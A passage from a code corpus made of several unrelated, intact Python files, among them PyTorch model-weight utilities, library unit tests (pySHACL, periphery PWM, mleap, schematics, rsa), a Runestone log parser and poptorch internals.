def extract_encoder(path: str) -> Tuple[str, Dict[str, Tensor]]:
"""Extracts an encoder from a pytorch lightning checkpoint file.
Args:
path: path to checkpoint file (.ckpt)
Returns:
tuple containing model name and state dict
Raises:
ValueError: if 'classification_model' or 'encoder' not in
checkpoint['hyper_parameters']
"""
checkpoint = torch.load( # type: ignore[no-untyped-call]
path, map_location=torch.device("cpu") # type: ignore[attr-defined]
)
if "classification_model" in checkpoint["hyper_parameters"]:
name = checkpoint["hyper_parameters"]["classification_model"]
state_dict = checkpoint["state_dict"]
state_dict = OrderedDict({k: v for k, v in state_dict.items() if "model." in k})
state_dict = OrderedDict(
{k.replace("model.", ""): v for k, v in state_dict.items()}
)
elif "encoder" in checkpoint["hyper_parameters"]:
name = checkpoint["hyper_parameters"]["encoder"]
state_dict = checkpoint["state_dict"]
state_dict = OrderedDict(
{k: v for k, v in state_dict.items() if "model.encoder.model" in k}
)
state_dict = OrderedDict(
{k.replace("model.encoder.model.", ""): v for k, v in state_dict.items()}
)
else:
raise ValueError(
"Unknown checkpoint task. Only encoder or classification_model"
" extraction is supported"
)
return name, state_dict
def load_state_dict(model: Module, state_dict: Dict[str, Tensor]) -> Module:
"""Load pretrained resnet weights to a model.
Args:
model: model to load the pretrained weights to
state_dict: dict containing tensor parameters
Returns:
the model with pretrained weights
Warns:
If input channels in model != pretrained model input channels
If num output classes in model != pretrained model num classes
"""
in_channels = model.conv1.in_channels # type: ignore[union-attr]
expected_in_channels = state_dict["conv1.weight"].shape[1]
num_classes = model.fc.out_features # type: ignore[union-attr]
expected_num_classes = state_dict["fc.weight"].shape[0]
if in_channels != expected_in_channels:
warnings.warn(
f"input channels {in_channels} != input channels in pretrained"
f" model {expected_in_channels}. Overriding with new input channels"
)
del state_dict["conv1.weight"]
if num_classes != expected_num_classes:
warnings.warn(
f"num classes {num_classes} != num classes in pretrained model"
f" {expected_num_classes}. Overriding with new num classes"
)
del state_dict["fc.weight"], state_dict["fc.bias"]
model.load_state_dict(state_dict, strict=False) # type: ignore[arg-type]
return model
def reinit_initial_conv_layer(
layer: Conv2d,
new_in_channels: int,
keep_rgb_weights: bool,
new_stride: Optional[Union[int, Tuple[int, int]]] = None,
new_padding: Optional[Union[str, Union[int, Tuple[int, int]]]] = None,
) -> Conv2d:
"""Clones a Conv2d layer while optionally retaining some of the original weights.
When replacing the first convolutional layer in a model with one that operates over
different number of input channels, we sometimes want to keep a subset of the kernel
weights the same (e.g. the RGB weights of an ImageNet pretrained model). This is a
    convenience function that performs exactly that.
Args:
layer: the Conv2d layer to initialize
new_in_channels: the new number of input channels
        keep_rgb_weights: flag indicating whether to keep the original weights of the first 3 (RGB) channels
new_stride: optionally, overwrites the ``layer``'s stride with this value
        new_padding: optionally, overwrites the ``layer``'s padding with this value
Returns:
a Conv2d layer with new kernel weights
"""
use_bias = layer.bias is not None
if keep_rgb_weights:
w_old = layer.weight.data[:, :3, :, :].clone()
if use_bias:
# mypy doesn't realize that bias isn't None here...
b_old = layer.bias.data.clone() # type: ignore[union-attr]
updated_stride = layer.stride if new_stride is None else new_stride
updated_padding = layer.padding if new_padding is None else new_padding
new_layer = Conv2d(
new_in_channels,
layer.out_channels,
kernel_size=layer.kernel_size, # type: ignore[arg-type]
stride=updated_stride, # type: ignore[arg-type]
padding=updated_padding, # type: ignore[arg-type]
dilation=layer.dilation, # type: ignore[arg-type]
groups=layer.groups,
bias=use_bias,
padding_mode=layer.padding_mode,
)
nn.init.kaiming_normal_( # type: ignore[no-untyped-call]
new_layer.weight, mode="fan_out", nonlinearity="relu"
)
if keep_rgb_weights:
new_layer.weight.data[:, :3, :, :] = w_old
if use_bias:
new_layer.bias.data = b_old # type: ignore[union-attr]
return new_layer
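# Minimal usage sketch (an assumption; torchvision is not imported by this module):
#
#   import torchvision
#   backbone = torchvision.models.resnet18(pretrained=False)
#   # replace the stem to accept 4-band imagery, keeping the first three (RGB) kernel channels
#   backbone.conv1 = reinit_initial_conv_layer(backbone.conv1, new_in_channels=4, keep_rgb_weights=True)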
|
test/issues/test_071.py
|
ajnelson-nist/pySHACL
| 167 |
100951
|
# -*- coding: utf-8 -*-
#
"""
https://github.com/RDFLib/pySHACL/issues/71
"""
import rdflib
from pyshacl import validate
shacl_file_text = """\
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dc: <http://purl.org/dc/elements/1.1/> .
@prefix sh: <http://www.w3.org/ns/shacl#> .
@prefix xml: <http://www.w3.org/XML/1998/namespace> .
@prefix xsd: <http://www.w3.org/2001/XMLSchema#> .
@prefix owl: <http://www.w3.org/2002/07/owl#> .
@prefix geo: <http://example.org/geo/> .
@prefix ex: <http://example.com#> .
@prefix : <http://example.com/issue/071#> .
<http://example.com/issue/071>
rdf:type owl:Ontology .
:PlaceShape
a sh:NodeShape ;
sh:targetClass ex:Place ;
sh:property [
sh:path geo:asWKT ;
sh:nodeKind sh:Literal ;
sh:datatype rdfs:Literal ;
] ;
sh:property [
sh:path geo:asWKT ;
sh:nodeKind sh:Literal ;
sh:datatype rdfs:Datatype ;
] ;
sh:property [
sh:path geo:asWKT ;
sh:nodeKind sh:Literal ;
sh:datatype geo:wktLiteral ;
] ;
.
"""
data_file_text = """\
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dc: <http://purl.org/dc/elements/1.1/> .
@prefix dct: <http://purl.org/dc/terms/> .
@prefix xml: <http://www.w3.org/XML/1998/namespace> .
@prefix xsd: <http://www.w3.org/2001/XMLSchema#> .
@prefix owl: <http://www.w3.org/2002/07/owl#> .
@prefix geo: <http://example.org/geo/> .
@prefix ex: <http://example.com#> .
geo:hasSerialization
a rdfs:Property ;
a owl:DatatypeProperty ;
rdfs:domain geo:Geometry ;
rdfs:range rdfs:Literal ;
.
geo:asWKT
a rdfs:Property ;
a owl:DatatypeProperty ;
rdfs:subPropertyOf geo:hasSerialization ;
rdfs:domain geo:Geometry ;
rdfs:range geo:wktLiteral ;
.
geo:wktLiteral
a rdfs:Datatype ;
dc:description "A Well-known Text serialization of a geometry object." ;
.
ex:Place
a rdfs:Class ;
rdfs:subClassOf geo:Geometry ;
.
ex:test1
a ex:Place ;
geo:asWKT "POINT(45.75 4.85)"^^geo:wktLiteral ;
dc:title "test1" ;
.
"""
def test_071_positive():
data = rdflib.Graph()
data.parse(data=data_file_text, format="turtle")
res = validate(
data,
shacl_graph=shacl_file_text,
data_graph_format='turtle',
shacl_graph_format='turtle',
inference='rdfs',
debug=True,
)
conforms, graph, string = res
assert conforms
if __name__ == "__main__":
test_071_positive()
|
tests/nnapi/specs/V1_0/concat_float_4D_axis3_1_nnfw.mod.py
|
periannath/ONE
| 255 |
100974
|
#
# Copyright (C) 2017 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# model
model = Model()
i1 = Input("op1", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 0
i2 = Input("op2", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 1
i3 = Input("op3", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 2
axis0 = Int32Scalar("axis0", 3)
r = Output("result", "TENSOR_FLOAT32", "{1, 2, 3, 6}") # output
model = model.Operation("CONCATENATION", i1, i2, i3, axis0).To(r)
# Example 1.
input0 = {i1: [-0.03203143, -0.0334147 , -0.02527265, 0.04576106, 0.08869292,
0.06428383, -0.06473722, -0.21933985, -0.05541003, -0.24157837,
-0.16328812, -0.04581105],
i2: [-0.0569439 , -0.15872048, 0.02965238, -0.12761882, -0.00185435,
-0.03297619, 0.03581043, -0.12603407, 0.05999133, 0.00290503,
0.1727029 , 0.03342071],
i3: [ 0.10992613, 0.09185287, 0.16433905, -0.00059073, -0.01480746,
0.0135175 , 0.07129054, -0.15095694, -0.04579685, -0.13260484,
-0.10045543, 0.0647094 ]}
output0 = {r: [-0.03203143, -0.0334147 , -0.0569439 , -0.15872048, 0.10992613,
0.09185287, -0.02527265, 0.04576106, 0.02965238, -0.12761882,
0.16433905, -0.00059073, 0.08869292, 0.06428383, -0.00185435,
-0.03297619, -0.01480746, 0.0135175 , -0.06473722, -0.21933985,
0.03581043, -0.12603407, 0.07129054, -0.15095694, -0.05541003,
-0.24157837, 0.05999133, 0.00290503, -0.04579685, -0.13260484,
-0.16328812, -0.04581105, 0.1727029 , 0.03342071, -0.10045543,
0.0647094 ]}
# Instantiate an example
Example((input0, output0))
'''
# The above data was generated with the code below:
with tf.Session() as sess:
t1 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
t2 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
t3 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
c1 = tf.concat([t1, t2, t3], axis=3)
print(c1) # print shape
print( sess.run([tf.reshape(t1, [12]),
tf.reshape(t2, [12]),
tf.reshape(t3, [12]),
tf.reshape(c1, [1*2*3*(2*3)])]))
'''
|
tests/test_pwm.py
|
CrazyIvan359/python-periphery
| 433 |
100993
|
import os
import sys
import periphery
from .test import ptest, pokay, passert, AssertRaises
if sys.version_info[0] == 3:
raw_input = input
pwm_chip = None
pwm_channel = None
def test_arguments():
ptest()
# Invalid open types
with AssertRaises("invalid open types", TypeError):
periphery.PWM("foo", 0)
with AssertRaises("invalid open types", TypeError):
periphery.PWM(0, "foo")
def test_open_close():
ptest()
# Open non-existent PWM chip
with AssertRaises("non-existent PWM chip", LookupError):
periphery.PWM(9999, pwm_channel)
# Open non-existent PWM channel
with AssertRaises("non-existent PWM channel", periphery.PWMError):
periphery.PWM(pwm_chip, 9999)
# Open legitimate PWM chip/channel
pwm = periphery.PWM(pwm_chip, pwm_channel)
passert("property chip", pwm.chip == pwm_chip)
passert("property channel", pwm.channel == pwm_channel)
# Initialize period and duty cycle
pwm.period = 5e-3
pwm.duty_cycle = 0
# Set period, check period, check period_ns, check frequency
pwm.period = 1e-3
passert("period is correct", abs(pwm.period - 1e-3) < 1e-4)
passert("period_ns is correct", abs(pwm.period_ns - 1000000) < 1e5)
passert("frequency is correct", abs(pwm.frequency - 1000) < 100)
pwm.period = 5e-4
passert("period is correct", abs(pwm.period - 5e-4) < 1e-5)
passert("period_ns is correct", abs(pwm.period_ns - 500000) < 1e4)
passert("frequency is correct", abs(pwm.frequency - 2000) < 100)
# Set frequency, check frequency, check period, check period_ns
pwm.frequency = 1000
passert("frequency is correct", abs(pwm.frequency - 1000) < 100)
passert("period is correct", abs(pwm.period - 1e-3) < 1e-4)
passert("period_ns is correct", abs(pwm.period_ns - 1000000) < 1e5)
pwm.frequency = 2000
passert("frequency is correct", abs(pwm.frequency - 2000) < 100)
passert("period is correct", abs(pwm.period - 5e-4) < 1e-5)
passert("period_ns is correct", abs(pwm.period_ns - 500000) < 1e4)
# Set period_ns, check period_ns, check period, check frequency
pwm.period_ns = 1000000
passert("period_ns is correct", abs(pwm.period_ns - 1000000) < 1e5)
passert("period is correct", abs(pwm.period - 1e-3) < 1e-4)
passert("frequency is correct", abs(pwm.frequency - 1000) < 100)
pwm.period_ns = 500000
passert("period_ns is correct", abs(pwm.period_ns - 500000) < 1e4)
passert("period is correct", abs(pwm.period - 5e-4) < 1e-5)
passert("frequency is correct", abs(pwm.frequency - 2000) < 100)
pwm.period_ns = 1000000
# Set duty cycle, check duty cycle, check duty_cycle_ns
pwm.duty_cycle = 0.25
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.25) < 1e-3)
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 250000) < 1e4)
pwm.duty_cycle = 0.50
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.50) < 1e-3)
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 500000) < 1e4)
pwm.duty_cycle = 0.75
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.75) < 1e-3)
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 750000) < 1e4)
# Set duty_cycle_ns, check duty_cycle_ns, check duty_cycle
pwm.duty_cycle_ns = 250000
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 250000) < 1e4)
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.25) < 1e-3)
pwm.duty_cycle_ns = 500000
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 500000) < 1e4)
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.50) < 1e-3)
pwm.duty_cycle_ns = 750000
passert("duty_cycle_ns is correct", abs(pwm.duty_cycle_ns - 750000) < 1e4)
passert("duty_cycle is correct", abs(pwm.duty_cycle - 0.75) < 1e-3)
# Set polarity, check polarity
pwm.polarity = "normal"
passert("polarity is normal", pwm.polarity == "normal")
pwm.polarity = "inversed"
passert("polarity is inversed", pwm.polarity == "inversed")
# Set enabled, check enabled
pwm.enabled = True
passert("pwm is enabled", pwm.enabled == True)
pwm.enabled = False
passert("pwm is disabled", pwm.enabled == False)
# Use enable()/disable(), check enabled
pwm.enable()
passert("pwm is enabled", pwm.enabled == True)
pwm.disable()
passert("pwm is disabled", pwm.enabled == False)
# Set invalid polarity
with AssertRaises("set invalid polarity", ValueError):
pwm.polarity = "foo"
pwm.close()
def test_loopback():
ptest()
def test_interactive():
ptest()
pwm = periphery.PWM(pwm_chip, pwm_channel)
print("Starting interactive test. Get out your oscilloscope, buddy!")
raw_input("Press enter to continue...")
# Set initial parameters and enable PWM
pwm.duty_cycle = 0.0
pwm.frequency = 1e3
pwm.polarity = "normal"
pwm.enabled = True
# Check tostring
print("PWM description: {}".format(str(pwm)))
passert("interactive success", raw_input("PWM description looks ok? y/n ") == "y")
# Set 1 kHz frequency, 0.25 duty cycle
pwm.frequency = 1e3
pwm.duty_cycle = 0.25
passert("interactive success", raw_input("Frequency is 1 kHz, duty cycle is 25%? y/n ") == "y")
# Set 1 kHz frequency, 0.50 duty cycle
pwm.frequency = 1e3
pwm.duty_cycle = 0.50
passert("interactive success", raw_input("Frequency is 1 kHz, duty cycle is 50%? y/n ") == "y")
# Set 2 kHz frequency, 0.25 duty cycle
pwm.frequency = 2e3
pwm.duty_cycle = 0.25
passert("interactive success", raw_input("Frequency is 2 kHz, duty cycle is 25%? y/n ") == "y")
# Set 2 kHz frequency, 0.50 duty cycle
pwm.frequency = 2e3
pwm.duty_cycle = 0.50
passert("interactive success", raw_input("Frequency is 2 kHz, duty cycle is 50%? y/n ") == "y")
pwm.duty_cycle = 0.0
pwm.enabled = False
pwm.close()
if __name__ == "__main__":
if os.environ.get("CI") == "true":
test_arguments()
sys.exit(0)
if len(sys.argv) < 3:
print("Usage: python -m tests.test_pwm <PWM chip> <PWM channel>")
print("")
print("[1/4] Arguments test: No requirements.")
print("[2/4] Open/close test: PWM channel should be real.")
print("[3/4] Loopback test: No test.")
print("[4/4] Interactive test: PWM channel should be observed with an oscilloscope or logic analyzer.")
print("")
print("Hint: for Raspberry Pi 3, enable PWM0 and PWM1 with:")
print(" $ echo \"dtoverlay=pwm-2chan,pin=18,func=2,pin2=13,func2=4\" | sudo tee -a /boot/config.txt")
print(" $ sudo reboot")
print("Monitor GPIO 18 (header pin 12), and run this test with:")
print(" python -m tests.test_pwm 0 0")
print("or, monitor GPIO 13 (header pin 33), and run this test with:")
print(" python -m tests.test_pwm 0 1")
print("")
sys.exit(1)
pwm_chip = int(sys.argv[1])
pwm_channel = int(sys.argv[2])
test_arguments()
pokay("Arguments test passed.")
test_open_close()
pokay("Open/close test passed.")
test_loopback()
pokay("Loopback test passed.")
test_interactive()
pokay("Interactive test passed.")
pokay("All tests passed!")
|
marley/worlds/blackjack/__init__.py
|
cool-RR/grid_royale
| 255 |
100997
|
# Copyright 2020 <NAME> and collaborators.
# This program is distributed under the MIT license.
from .core import *
from .sharknadoing import *
from .commanding import command_group
|
python/tests/sklearn/preprocessing/one_hot_encoder_test.py
|
voganrc/mleap
| 1,401 |
101008
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import shutil
import tempfile
import unittest
import numpy as np
from mleap.sklearn.preprocessing.data import LabelEncoder
from mleap.sklearn.preprocessing.data import OneHotEncoder
class TestOneHotEncoder(unittest.TestCase):
def setUp(self):
labels = ['a', 'b', 'c', 'a', 'b', 'b']
self.le = LabelEncoder(input_features=['label'], output_features='label_le_encoded')
self.oh_data = self.le.fit_transform(labels).reshape(-1, 1)
self.tmp_dir = tempfile.mkdtemp(prefix="mleap.python.tests")
def tearDown(self):
shutil.rmtree(self.tmp_dir)
def test_one_hot_encoder_serialization_fails_on_multiple_feature_columns(self):
self.oh_data = np.hstack((self.oh_data, self.oh_data)) # make two feature columns
ohe = OneHotEncoder(handle_unknown='error')
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
with self.assertRaises(NotImplementedError):
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
def test_one_hot_encoder_serialization_fails_on_an_invalid_category_range(self):
self.oh_data[2][0] = 3 # make invalid category range
ohe = OneHotEncoder(handle_unknown='error')
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
with self.assertRaises(ValueError):
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
def test_one_hot_encoder_serialization_fails_when_using_the_drop_param(self):
ohe = OneHotEncoder(handle_unknown='error', drop='first') # try to use `drop` parameter
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
with self.assertRaises(NotImplementedError):
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
def test_one_hot_encoder_serialization_fails_when_using_the_dtype_param(self):
ohe = OneHotEncoder(handle_unknown='error', dtype=int) # try to use `dtype` parameter
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
with self.assertRaises(NotImplementedError):
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
def test_one_hot_encoder_serialization_succeeds_when_handle_unknown_is_set_to_error(self):
ohe = OneHotEncoder(handle_unknown='error')
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
with open("{}/{}.node/model.json".format(self.tmp_dir, ohe.name)) as json_data:
model = json.load(json_data)
self.assertEqual('one_hot_encoder', model['op'])
self.assertEqual(3, model['attributes']['size']['long'])
self.assertEqual('error', model['attributes']['handle_invalid']['string'])
self.assertEqual(False, model['attributes']['drop_last']['boolean'])
def test_one_hot_encoder_deserialization_succeeds_when_handle_unknown_is_set_to_error(self):
ohe = OneHotEncoder(handle_unknown='error')
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
node_name = "{}.node".format(ohe.name)
ohe_ds = OneHotEncoder()
ohe_ds.deserialize_from_bundle(self.tmp_dir, node_name)
self.oh_data[2][0] = 3 # Add an unknown category
with self.assertRaises(ValueError):
ohe_ds.transform(self.oh_data)
def test_one_hot_encoder_serialization_succeeds_when_handle_unknown_is_set_to_ignore(self):
labels = ['a', 'b', 'c', 'a', 'b', 'b']
le = LabelEncoder(input_features=['label'], output_features='label_le_encoded')
oh_data = le.fit_transform(labels).reshape(-1, 1)
ohe = OneHotEncoder(handle_unknown='ignore')
ohe.mlinit(prior_tf=le, output_features='{}_one_hot_encoded'.format(le.output_features))
ohe.fit(oh_data)
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
with open("{}/{}.node/model.json".format(self.tmp_dir, ohe.name)) as json_data:
model = json.load(json_data)
self.assertEqual('one_hot_encoder', model['op'])
self.assertEqual(3, model['attributes']['size']['long'])
self.assertEqual('keep', model['attributes']['handle_invalid']['string'])
self.assertEqual(True, model['attributes']['drop_last']['boolean'])
def test_one_hot_encoder_deserialization_succeeds_when_handle_unknown_is_set_to_ignore(self):
ohe = OneHotEncoder(handle_unknown='ignore')
ohe.mlinit(prior_tf=self.le, output_features='{}_one_hot_encoded'.format(self.le.output_features))
ohe.fit(self.oh_data)
ohe.serialize_to_bundle(self.tmp_dir, ohe.name)
node_name = "{}.node".format(ohe.name)
ohe_ds = OneHotEncoder()
ohe_ds.deserialize_from_bundle(self.tmp_dir, node_name)
self.oh_data[2][0] = 3 # Add an unknown category
expected = ohe.transform(self.oh_data).todense()
actual = ohe_ds.transform(self.oh_data)
np.testing.assert_array_equal(expected, actual)
|
tests/v1/id.py
|
tombry/virlutils
| 133 |
101029
|
from . import BaseTest
from .mocks.api import MockVIRLServer
from click.testing import CliRunner
import requests_mock
from virl.cli.main import virl
class IdTest(BaseTest):
def test_virl_id_nosim(self):
with requests_mock.mock() as m:
# Mock the request to return what we expect from the API.
m.get('http://localhost:19399/simengine/rest/list',
json=MockVIRLServer.list_simulations())
runner = CliRunner()
result = runner.invoke(virl, ["id"])
self.assertEqual("virlutils-id\n", result.output)
|
scripts/parseLog.py
|
Kandongwe/RunestoneServer
| 344 |
101062
|
#!/usr/bin/env python3
# {address space usage: 359067648 bytes/342MB} {rss usage: 107823104 bytes/102MB} [pid: 11266|app: 0|req: 99163/885977] 172.16.31.10 () {48 vars in 1249 bytes} [Thu Feb 15 16:28:43 2018] GET /runestone/ajax/getnumonline => generated 16 bytes in 2553 msecs (HTTP/1.1 200) 8 headers in 381 bytes (1 switches on core 0)
import re, sys
timepat = re.compile(r'.*\[((Mon|Tue|Wed|Thu|Fri|Sat|Sun) (Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec).*\d\d\d\d)\].*/runestone/ajax/(\w+)(\s|\?).*\s(\d+)\s+msecs.*')
logfile = open(sys.argv[1], 'r')
for line in logfile:
g = timepat.match(line)
if g:
print("{},{},{}".format(g.group(1),g.group(4), g.group(6)))
|
python/_impl.py
|
gglin001/poptorch
| 128 |
101073
|
# Copyright (c) 2020 Graphcore Ltd. All rights reserved.
from contextlib import contextmanager
import copy
import fcntl
import hashlib
import os
from typing import Dict, Any
import torch
# Do not import any poptorch.* here: it will break the poptorch module
from ._logging import logger
from . import poptorch_core
# A flag to tell the user if the current target is IPU. This is to allow
# divergent IPU/CPU codepaths within one model.
_is_ipu_context = False
def createPoptorchError(msg):
type = "poptorch_py_error"
error = poptorch_core.Error(f"'{type}': {msg}")
error.type = type
error.message = msg
error.location = ""
return error
def isRunningOnIpu() -> bool:
""" This function returns `True` when executing on IPU and `False` when
executing the model outside IPU scope. This allows for separate
codepaths to be marked in the model simply by using:
>>> if poptorch.isRunningOnIpu():
>>> # IPU path
>>> else:
>>> # CPU path
Note this will only apply to code during execution. During model
creation it will always return `False`.
:returns: True if running on IPU, otherwise False.
"""
global _is_ipu_context
return _is_ipu_context
def setIpuContext(val: bool):
global _is_ipu_context
_is_ipu_context = val
def internal_cast(tensor, dtype):
if dtype in [torch.float, torch.float32]:
return torch.ops.poptorch.internal_cast(tensor, "FLOAT")
if dtype in [torch.half, torch.float16]:
return torch.ops.poptorch.internal_cast(tensor, "FLOAT16")
raise ValueError(
'Invalid poptorch.cast target type. Expecting torch.float or torch.half'
)
def applyOptimizer(optimizer):
num_groups = len(optimizer.param_groups)
for index in range(0, num_groups):
torch.ops.poptorch.optimizer_group(
index, optimizer.param_groups[index]["params"])
# To understand which variable groups the user wants to apply the
# optimizer to we need to mark them via a wrapper. We do this because
# when we reference the variables in the context of the operation we
# get the corresponding IR value for "free" as part of the trace.
# Otherwise we would need a system to map the variable in the optimizer
# to the variable in the model to the variable in the IR.
class OptimizerWrapper(torch.nn.Module):
def __init__(self, model, optimizer):
super().__init__()
self.model = model
self.optimizer = optimizer
def forward(self, *args, **kwargs):
out = self.model(*args, **kwargs)
applyOptimizer(self.optimizer)
return out
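# Presumed usage of the wrapper above (illustrative; the actual call site is outside this
# excerpt): the training harness forwards through OptimizerWrapper so the optimizer's
# parameter groups are marked during the same trace as the model itself, e.g.
#
#   wrapped = OptimizerWrapper(model, optimizer)
#   out = wrapped(*inputs)   # runs the model, then tags each optimizer param group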
@contextmanager
def distributedCacheLock(model, opts):
"""In a distributed environment we only want the model to be compiled once.
If there is only one process or if the cache is not enabled:
no need for a lock, early return.
Otherwise:
The first process to reach the lock takes it and compiles the model.
The model will be added to the PopART cache.
After the first process releases the lock the other ones will grab it
        one at a time and compile the model too (except that they will
now all hit the cache).
The last process to grab / release the lock will delete the file.
        (Each process appends a character to the file, so the position in
the file when acquiring the lock indicates how many processes have
already successfully compiled the model).
"""
filename = None
if opts.Distributed.numProcesses > 1:
cache = opts._popart.options.get("cachePath", "") # pylint: disable=protected-access
if not cache:
logger.warning(
"Use poptorch.Options.enableExecutableCaching() to avoid "
"compiling the model once per process")
else:
os.makedirs(cache, exist_ok=True)
assert os.access(cache, os.W_OK), (f"Cache folder {cache}"
" is not writable")
filename = os.path.join(
cache, "%s.lock" %
hashlib.md5(repr(model).encode("utf-8")).hexdigest())
# Not distributed mode or the cache is not enabled: do nothing.
if not filename:
yield False
return
delete_file = False
try:
with open(filename, "a+") as f:
try:
fcntl.flock(f, fcntl.LOCK_EX)
# Add a character to the file
f.write("0")
logger.debug(
"Executable cache file locked by process %s (pos %d/%d)",
opts.Distributed.processId, f.tell(),
opts.Distributed.numProcesses)
delete_file = f.tell() == opts.Distributed.numProcesses
# Only the first process should compile
yield f.tell() == 1
finally:
logger.debug("Process %s released the cache lock",
opts.Distributed.processId)
fcntl.flock(f, fcntl.LOCK_UN)
finally:
if delete_file:
os.remove(filename)
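# Minimal usage sketch (illustrative; the real call site is outside this excerpt).
# The yielded boolean is True only for the first process to take the lock:
#
#   with distributedCacheLock(model, opts) as is_first_process:
#       ...  # compile / load the executable here while the lock is held
#
# Subsequent processes enter the block one at a time and are expected to hit the
# PopART executable cache instead of recompiling from scratch.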
# The pickle handlers are called in two cases: when an object is copied
# (i.e. copy.copy(obj)) or when an object is pickled / serialised.
# In both cases the object is first dumped using pickleUnwrapObject and then
# in the copy case _pickleRestoreWrapperIfPossible() is called immediately after
# to create the new object.
#
# The _wrapper_registry keeps track of the mapping between user model, parameter,
# buffer types and their corresponding wrapper.
# When an object is copied we want to preserve the Wrapper type: the PopTorch
# wrapper doesn't contain any attributes, so it's just a question of updating
# the __class__ attribute.
#
# When an object is loaded from file: the wrapper type doesn't exist anymore
# therefore we keep the object unwrapped. (It will be wrapped again when passed
# to poptorch.trainingModel anyway)
_wrapper_registry: Dict[int, Any] = {}
def _pickleRestoreWrapperIfPossible(obj):
wrapperType = _wrapper_registry.get(id(obj))
if wrapperType:
obj.__class__ = wrapperType
return obj
def pickleUnwrapObject(obj):
global _wrapper_registry
wrapperType = obj.__class__
obj.__class__ = obj.__class__.__bases__[0]
other = copy.copy(obj)
_wrapper_registry[id(other)] = wrapperType
obj.__class__ = wrapperType
return _pickleRestoreWrapperIfPossible, (other, )
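# Presumed registration of the reduce hook above (the actual call is not in this
# excerpt): copyreg can route copy/pickle of a wrapped type through pickleUnwrapObject,
# which strips the wrapper and remembers it in _wrapper_registry, e.g.
#
#   import copyreg
#   copyreg.pickle(SomeWrapperType, pickleUnwrapObject)   # SomeWrapperType is hypothetical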
|
third_party/gsutil/third_party/rsa/tests/test_parallel.py
|
tingshao/catapult
| 5,079 |
101113
|
"""Test for multiprocess prime generation."""
import unittest
import rsa.prime
import rsa.parallel
import rsa.common
class ParallelTest(unittest.TestCase):
"""Tests for multiprocess prime generation."""
def test_parallel_primegen(self):
p = rsa.parallel.getprime(1024, 3)
self.assertFalse(rsa.prime.is_prime(p - 1))
self.assertTrue(rsa.prime.is_prime(p))
self.assertFalse(rsa.prime.is_prime(p + 1))
self.assertEqual(1024, rsa.common.bit_size(p))
|
tests/test_model_type.py
|
Attsun1031/schematics
| 1,430 |
101135
|
<gh_stars>1000+
import pytest
from schematics.models import Model
from schematics.types import IntType, StringType
from schematics.types.compound import ModelType, ListType
from schematics.exceptions import DataError
from schematics.util import ImportStringError
def test_simple_embedded_models():
class Location(Model):
country_code = StringType()
class Player(Model):
id = IntType()
location = ModelType(Location)
p = Player(dict(id=1, location={"country_code": "US"}))
assert p.id == 1
assert p.location.country_code == "US"
p.location = Location({"country_code": "IS"})
assert isinstance(p.location, Location)
assert p.location.country_code == "IS"
def test_simple_embedded_models_is_none():
class Location(Model):
country_code = StringType()
class Player(Model):
id = IntType()
location = ModelType(Location)
p = Player(dict(id=1))
assert p.id == 1
assert p.location is None
def test_simple_embedded_model_set_to_none():
class Location(Model):
country_code = StringType()
class Player(Model):
id = IntType()
location = ModelType(Location)
p = Player(dict(id=1))
p.location = None
assert p.id == 1
assert p.location is None
